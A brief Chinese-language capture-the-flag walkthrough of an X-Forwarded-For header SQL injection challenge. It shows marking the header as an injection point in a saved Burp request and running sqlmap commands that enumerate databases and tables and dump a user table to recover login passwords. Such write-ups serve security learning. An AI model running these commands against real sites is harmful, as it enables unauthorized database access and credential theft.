题目是X-Forwarded-For注入漏洞实战,我们先来brup抓包
brup抓包发现没有X-Forwarded-For头。就试试添加X-Forwarded-For:0.0.0.0试试,发现有回显
那我们就把把X-Forwarded-For的值设置为*``即X-Forwarded-For:*,然后保存为1.txt
1.sqlmap -r 1.txt --dbs --batch爆库,注出information_schema库和webcalendar库
2.sqlmap -r 1.txt -D webcalendar --tables --batch爆表名,注出user和login表
3.sqlmap -r 1.txt --batch --dump-all -T"user" -D"webcalendar" ,dump出user里全部内容得到登录密码
相关文章: